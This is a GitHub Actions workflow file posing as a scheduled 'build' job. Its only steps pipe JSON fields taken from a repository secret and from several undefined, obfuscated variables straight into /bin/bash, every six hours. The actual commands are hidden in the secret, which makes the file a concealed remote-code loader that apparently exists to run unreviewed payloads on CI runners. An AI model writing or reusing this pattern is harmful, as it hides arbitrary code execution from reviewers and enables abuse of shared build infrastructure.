name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '51 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          x0946: ${{ secrets.x0946 }}
        run: |
          echo $x0946 | jq -r .bz4 | /bin/bash
          echo $cq50172 | jq -r .oyg7 | /bin/bash
          echo $wr0 | jq -r .hm6401 | /bin/bash
          echo $u0 | jq -r .kz36 | /bin/bash
          echo $gdo87689 | jq -r .ene0 | /bin/bash
          echo $at4804 | jq -r .s8521 | /bin/bash
          echo $oikzq31880 | jq -r .zje8996 | /bin/bash
          echo $hzank32 | jq -r .r6 | /bin/bash
          echo $k46011 | jq -r .vngwu67218 | /bin/bash

